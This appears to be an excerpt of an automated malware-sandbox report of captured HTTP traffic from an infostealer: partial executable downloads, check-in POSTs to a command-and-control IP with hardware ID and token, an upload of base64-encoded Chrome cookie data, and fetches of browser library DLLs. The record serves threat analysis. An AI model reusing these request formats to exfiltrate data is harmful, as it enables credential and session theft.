Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 06 Oct 2024 20:18:47 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "1f3950-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 06 Oct 2024 20:18:49 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "3ef50-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 06 Oct 2024 20:18:49 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "13bf0-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /folder/l3.exe HTTP/1.1Host: sst.myCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 45.145.4.234Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /ce4b71a59f4ee761.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AAKJEGCFBGDHJJJJJKJEHost: 45.145.4.234Content-Length: 214Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 41 4b 4a 45 47 43 46 42 47 44 48 4a 4a 4a 4a 4a 4b 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 32 44 43 41 34 37 32 33 31 39 35 31 31 31 37 33 38 38 33 36 35 0d 0a 2d 2d 2d 2d 2d 2d 41 41 4b 4a 45 47 43 46 42 47 44 48 4a 4a 4a 4a 4a 4b 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 0d 0a 2d 2d 2d 2d 2d 2d 41 41 4b 4a 45 47 43 46 42 47 44 48 4a 4a 4a 4a 4a 4b 4a 45 2d 2d 0d 0a Data Ascii: ------AAKJEGCFBGDHJJJJJKJEContent-Disposition: form-data; name="hwid"42DCA47231951117388365------AAKJEGCFBGDHJJJJJKJEContent-Disposition: form-data; name="build"default------AAKJEGCFBGDHJJJJJKJE--
Source: global traffic HTTP traffic detected: POST /ce4b71a59f4ee761.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IJEHCGIJECFIECBFIDGDHost: 45.145.4.234Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 4a 45 48 43 47 49 4a 45 43 46 49 45 43 42 46 49 44 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 65 37 31 33 36 38 64 36 39 63 36 33 39 32 38 31 39 32 31 62 36 34 36 32 65 32 64 37 36 37 38 64 37 63 64 31 65 31 62 30 33 37 63 61 39 34 63 37 37 63 36 35 37 65 33 62 32 66 32 36 63 31 33 39 63 66 65 31 31 32 34 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 45 48 43 47 49 4a 45 43 46 49 45 43 42 46 49 44 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 45 48 43 47 49 4a 45 43 46 49 45 43 42 46 49 44 47 44 2d 2d 0d 0a Data Ascii: ------IJEHCGIJECFIECBFIDGDContent-Disposition: form-data; name="token"6e71368d69c639281921b6462e2d7678d7cd1e1b037ca94c77c657e3b2f26c139cfe1124------IJEHCGIJECFIECBFIDGDContent-Disposition: form-data; name="message"browsers------IJEHCGIJECFIECBFIDGD--
Source: global traffic HTTP traffic detected: POST /ce4b71a59f4ee761.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DAECAECFCAAEBFHIEHDGHost: 45.145.4.234Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 41 45 43 41 45 43 46 43 41 41 45 42 46 48 49 45 48 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 65 37 31 33 36 38 64 36 39 63 36 33 39 32 38 31 39 32 31 62 36 34 36 32 65 32 64 37 36 37 38 64 37 63 64 31 65 31 62 30 33 37 63 61 39 34 63 37 37 63 36 35 37 65 33 62 32 66 32 36 63 31 33 39 63 66 65 31 31 32 34 0d 0a 2d 2d 2d 2d 2d 2d 44 41 45 43 41 45 43 46 43 41 41 45 42 46 48 49 45 48 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 44 41 45 43 41 45 43 46 43 41 41 45 42 46 48 49 45 48 44 47 2d 2d 0d 0a Data Ascii: ------DAECAECFCAAEBFHIEHDGContent-Disposition: form-data; name="token"6e71368d69c639281921b6462e2d7678d7cd1e1b037ca94c77c657e3b2f26c139cfe1124------DAECAECFCAAEBFHIEHDGContent-Disposition: form-data; name="message"plugins------DAECAECFCAAEBFHIEHDG--
Source: global traffic HTTP traffic detected: POST /ce4b71a59f4ee761.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AEBGIEGCFHCFHIDHIJECHost: 45.145.4.234Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 45 42 47 49 45 47 43 46 48 43 46 48 49 44 48 49 4a 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 65 37 31 33 36 38 64 36 39 63 36 33 39 32 38 31 39 32 31 62 36 34 36 32 65 32 64 37 36 37 38 64 37 63 64 31 65 31 62 30 33 37 63 61 39 34 63 37 37 63 36 35 37 65 33 62 32 66 32 36 63 31 33 39 63 66 65 31 31 32 34 0d 0a 2d 2d 2d 2d 2d 2d 41 45 42 47 49 45 47 43 46 48 43 46 48 49 44 48 49 4a 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 41 45 42 47 49 45 47 43 46 48 43 46 48 49 44 48 49 4a 45 43 2d 2d 0d 0a Data Ascii: ------AEBGIEGCFHCFHIDHIJECContent-Disposition: form-data; name="token"6e71368d69c639281921b6462e2d7678d7cd1e1b037ca94c77c657e3b2f26c139cfe1124------AEBGIEGCFHCFHIDHIJECContent-Disposition: form-data; name="message"fplugins------AEBGIEGCFHCFHIDHIJEC--
Source: global traffic HTTP traffic detected: POST /ce4b71a59f4ee761.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EBFBKKJECAKEHJJJDBAFHost: 45.145.4.234Content-Length: 6455Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /bc17a177456805bc/sqlite3.dll HTTP/1.1Host: 45.145.4.234Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /ce4b71a59f4ee761.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BGDAKEHIIDGDAAKECBFBHost: 45.145.4.234Content-Length: 751Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 47 44 41 4b 45 48 49 49 44 47 44 41 41 4b 45 43 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 65 37 31 33 36 38 64 36 39 63 36 33 39 32 38 31 39 32 31 62 36 34 36 32 65 32 64 37 36 37 38 64 37 63 64 31 65 31 62 30 33 37 63 61 39 34 63 37 37 63 36 35 37 65 33 62 32 66 32 36 63 31 33 39 63 66 65 31 31 32 34 0d 0a 2d 2d 2d 2d 2d 2d 42 47 44 41 4b 45 48 49 49 44 47 44 41 41 4b 45 43 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 42 47 44 41 4b 45 48 49 49 44 47 44 41 41 4b 45 43 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 52 6b 46 4d 55 30 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 7a 45 79 4d 6a 6b 77 4f 44 41 79 43 55 35 4a 52 41 6b 31 4d 54 45 39 56 55 4a 6c 54 6b 4e 72 57 6a 4e 4d 4f 48 6c 59 59 33 67 34 63 57 67 30 53 6b 5a 56 57 47 74 33 61 30 35 44 4f 55 6c 79 5a 47 6c 53 5a 47 4a 71 55 31 52 71 63 56 4e 70 52 6d 67 34 56 33 4a 53 59 32 4a 4c 63 6c 39 79 54 30 70 69 5a 30 68 5a 4e 6c 52 42 4e 46 4a 55 4c 54 5a 77 63 7a 42 69 61 47 56 74 5a 6e 64 44 55 45 4a 7a 54 45 31 6e 55 46 51 33 4c 57 64 55 59 31 64 78 53 48 5a 61 64 6c 70 69 59 57 5a 50 63 47 74 78 55 6e 6b 77 5a 45 78 35 57 55 63 35 51 57 70 51 4d 6e 5a 69 56 55 4a 76 62 57 46 79 62 6d 4d 35 63 47 4e 61 56 6d 78 6f 53 47 74 56 5a 56 56 68 56 30 31 31 63 6b 51 77 52 30 64 59 65 56 63 77 4e 56 39 43 58 7a 46 4a 65 56 56 4f 57 55 56 46 54 47 31 35 63 56 4a 6e 43 69 35 6e 62 32 39 6e 62 47 55 75 59 32 39 74 43 56 52 53 56 55 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 6a 6b 35 4d 44 63 78 4e 6a 51 77 43 54 46 51 58 30 70 42 55 67 6b 79 4d 44 49 7a 4c 54 45 77 4c 54 41 31 4c 54 41 32 43 67 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 42 47 44 41 4b 45 48 49 49 44 47 44 41 41 4b 45 43 42 46 42 2d 2d 0d 0a Data Ascii: ------BGDAKEHIIDGDAAKECBFBContent-Disposition: form-data; name="token"6e71368d69c639281921b6462e2d7678d7cd1e1b037ca94c77c657e3b2f26c139cfe1124------BGDAKEHIIDGDAAKECBFBContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------BGDAKEHIIDGDAAKECBFBContent-Disposition: form-data; name="file"Lmdvb2dsZS5jb20JRkFMU0UJLwlGQUxTRQkxNzEyMjkwODAyCU5JRAk1MTE9VUJlTkNrWjNMOHlYY3g4cWg0SkZVWGt3a05DOUlyZGlSZGJqU1RqcVNpRmg4V3JSY2JLcl9yT0piZ0hZNlRBNFJULTZwczBiaGVtZndDUEJzTE1nUFQ
Source: global traffic HTTP traffic detected: POST /ce4b71a59f4ee761.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EHDBGDHDAECBGDHJKFIDHost: 45.145.4.234Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 48 44 42 47 44 48 44 41 45 43 42 47 44 48 4a 4b 46 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 65 37 31 33 36 38 64 36 39 63 36 33 39 32 38 31 39 32 31 62 36 34 36 32 65 32 64 37 36 37 38 64 37 63 64 31 65 31 62 30 33 37 63 61 39 34 63 37 37 63 36 35 37 65 33 62 32 66 32 36 63 31 33 39 63 66 65 31 31 32 34 0d 0a 2d 2d 2d 2d 2d 2d 45 48 44 42 47 44 48 44 41 45 43 42 47 44 48 4a 4b 46 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 45 48 44 42 47 44 48 44 41 45 43 42 47 44 48 4a 4b 46 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 45 48 44 42 47 44 48 44 41 45 43 42 47 44 48 4a 4b 46 49 44 2d 2d 0d 0a Data Ascii: ------EHDBGDHDAECBGDHJKFIDContent-Disposition: form-data; name="token"6e71368d69c639281921b6462e2d7678d7cd1e1b037ca94c77c657e3b2f26c139cfe1124------EHDBGDHDAECBGDHJKFIDContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------EHDBGDHDAECBGDHJKFIDContent-Disposition: form-data; name="file"------EHDBGDHDAECBGDHJKFID--
Source: global traffic HTTP traffic detected: POST /ce4b71a59f4ee761.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CAAAFCAKKKFBFIDGDBFHHost: 45.145.4.234Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 41 41 41 46 43 41 4b 4b 4b 46 42 46 49 44 47 44 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 65 37 31 33 36 38 64 36 39 63 36 33 39 32 38 31 39 32 31 62 36 34 36 32 65 32 64 37 36 37 38 64 37 63 64 31 65 31 62 30 33 37 63 61 39 34 63 37 37 63 36 35 37 65 33 62 32 66 32 36 63 31 33 39 63 66 65 31 31 32 34 0d 0a 2d 2d 2d 2d 2d 2d 43 41 41 41 46 43 41 4b 4b 4b 46 42 46 49 44 47 44 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 43 41 41 41 46 43 41 4b 4b 4b 46 42 46 49 44 47 44 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 43 41 41 41 46 43 41 4b 4b 4b 46 42 46 49 44 47 44 42 46 48 2d 2d 0d 0a Data Ascii: ------CAAAFCAKKKFBFIDGDBFHContent-Disposition: form-data; name="token"6e71368d69c639281921b6462e2d7678d7cd1e1b037ca94c77c657e3b2f26c139cfe1124------CAAAFCAKKKFBFIDGDBFHContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------CAAAFCAKKKFBFIDGDBFHContent-Disposition: form-data; name="file"------CAAAFCAKKKFBFIDGDBFH--
Source: global traffic HTTP traffic detected: GET /bc17a177456805bc/freebl3.dll HTTP/1.1Host: 45.145.4.234Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /bc17a177456805bc/mozglue.dll HTTP/1.1Host: 45.145.4.234Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /bc17a177456805bc/msvcp140.dll HTTP/1.1Host: 45.145.4.234Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /bc17a177456805bc/nss3.dll HTTP/1.1Host: 45.145.4.234Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /bc17a177456805bc/softokn3.dll HTTP/1.1Host: 45.145.4.234Cache-Control: no-cache
